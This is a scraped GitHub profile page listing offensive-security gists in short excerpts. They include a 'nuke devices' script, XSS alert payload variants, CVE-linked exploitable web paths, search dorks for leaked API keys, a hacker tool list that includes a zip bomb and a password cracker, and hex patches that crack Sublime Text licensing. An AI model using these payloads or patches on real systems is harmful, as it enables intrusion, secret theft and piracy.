Skip to content

Instantly share code, notes, and snippets.

View samidunimsara's full-sized avatar
πŸ™ƒ

nmsr samidunimsara

πŸ™ƒ
9 followers · 57 following
View GitHub Profile
@airborne-commando
airborne-commando / nuke.sh
Last active December 25, 2025 12:43
nuke devices
#!/bin/bash
# Check if the script is run as root
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root. Please use sudo or run as root."
exit 1
fi
# Function to install packages based on the distribution
install_packages() {
@bobby2000-github
bobby2000-github / gist-Phineas Fisher - Whistle-blowers.txt
Last active December 17, 2023 12:26
English translation version of Phineas Fisher's account of how he took down HackingTeam
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide for those without the patience to wait for whistleblowers
--[ 1 ]-- Introduction
@win3zz
win3zz / GitHub-Leaked-API-Keys-and-Secrets.md
Last active December 29, 2025 05:30

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

@searchformyusername
searchformyusername / CHAT GPT Hacks.md
Last active May 1, 2025 10:52
@ruevaughn
ruevaughn / 00-==}}======> bbht-resources-notes
Last active July 24, 2025 19:55
My Resources and Links over time to various Tools, Notes, Videos, Papers, Articles, Writeups, and more. Will be moving to my own private hosted Wikipedia soon. Ascii Art Font: Calvin S
╔╦╗╦ ╦ β•”β•— ┬ β”¬β”Œβ”€β” β•”β•— β”Œβ”€β”β”¬ β”¬β”Œβ”β”Œβ”¬β”β”¬ ┬ β•¦β•β•—β”Œβ”€β”β”Œβ”€β”β”Œβ”€β”β”¬ β”¬β”¬β”€β”β”Œβ”€β”β”Œβ”€β”β”Œβ”€β”
β•‘β•‘β•‘β•šβ•¦β• β• β•©β•—β”‚ β”‚β”‚ ┬ β• β•©β•—β”‚ β”‚β”‚ β”‚β”‚β”‚β”‚β”‚ β””β”¬β”˜ β• β•¦β•β”œβ”€ └─┐│ β”‚β”‚ β”‚β”œβ”¬β”˜β”‚ β”œβ”€ └─┐
β•© β•© β•© β•šβ•β•β””β”€β”˜β””β”€β”˜ β•šβ•β•β””β”€β”˜β””β”€β”˜β”˜β””β”˜β”΄ β”΄ β•©β•šβ•β””β”€β”˜β””β”€β”˜β””β”€β”˜β””β”€β”˜β”΄β””β”€β””β”€β”˜β””β”€β”˜β””β”€β”˜
//
()==========>>======================================--
\\
https://doepichack.com/
@kafkaesqu3
kafkaesqu3 / exploitable_webpaths.md
Last active October 8, 2025 15:50
easy wins - exploitable/leaky web paths
Exploit/description Path
Microsoft Office Online Server SSRF (relay) /op/view.aspx
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519 /jobmanager/logs/
CVE-2017-7615 /verify.php?id=1&confirm_hash=
CVE-2018-1000130 /jolokia
CVE-2018-1000130 /actuator/jolokia
leak /actuator/env
@yassineaboukir
yassineaboukir / alert.js
Created March 24, 2021 14:08 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active December 12, 2025 15:21
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@sirrushoo
sirrushoo / gist:71872b5d1dc8df159215de5aaf014384
Created October 21, 2019 18:30
0d1n|210.78028eb|Web security tool to make fuzzing at HTTP inputs, made in C with libCurl.| blackarch-webapp |https://github.com/CoolerVoid/0d1n
0trace|1.5|A hop enumeration tool.| blackarch-scanner |http://jon.oberheide.org/0trace/
3proxy|0.8.13|Tiny free proxy server.| blackarch-proxy |http://3proxy.ru/
3proxy-win32|0.8.13|Tiny free proxy server.| blackarch-windows |http://3proxy.ru/
42zip|42|Recursive Zip archive bomb.| blackarch-dos |http://blog.fefe.de/?ts=b6cea88d
a2sv|135.973ba13|Auto Scanning to SSL Vulnerability.| blackarch-scanner |https://github.com/hahwul/a2sv
abcd|4.2738809|ActionScript ByteCode Disassembler.| blackarch-disassembler |https://github.com/MITRECND/abcd
abuse-ssl-bypass-waf|5.3ffd16a|Bypassing WAF by abusing SSL/TLS Ciphers.| blackarch-webapp |https://github.com/LandGrey/abuse-ssl-bypass-waf
acccheck|0.2.1|A password dictionary attack tool that targets windows authentication via the SMB protocol.| blackarch-cracker |http://labs.portcullis.co.uk/tools/acccheck/
ace|1.10|Automated Corp
@JerryLokjianming
JerryLokjianming / Crack Sublime Text Windows and Linux.md
Last active December 29, 2025 04:03
Crack Sublime Text 3.2.2 Build 3211 and Sublime Text 4 Alpha 4098 with Hex

How to Crack Sublime Text 3.2.2 Build 3211 with Hex Editor (Windows | Without License) ↓

  1. Download & Install Sublime Text 3.2.2 Build 3211
  2. Visit https://hexed.it/
  3. Open file select sublime_text.exe
  4. Offset 0x8545: Original 84 -> 85
  5. Offset 0x08FF19: Original 75 -> EB
  6. Offset 0x1932C7: Original 75 -> 74 (remove UNREGISTERED in title bar, so no need to use a license)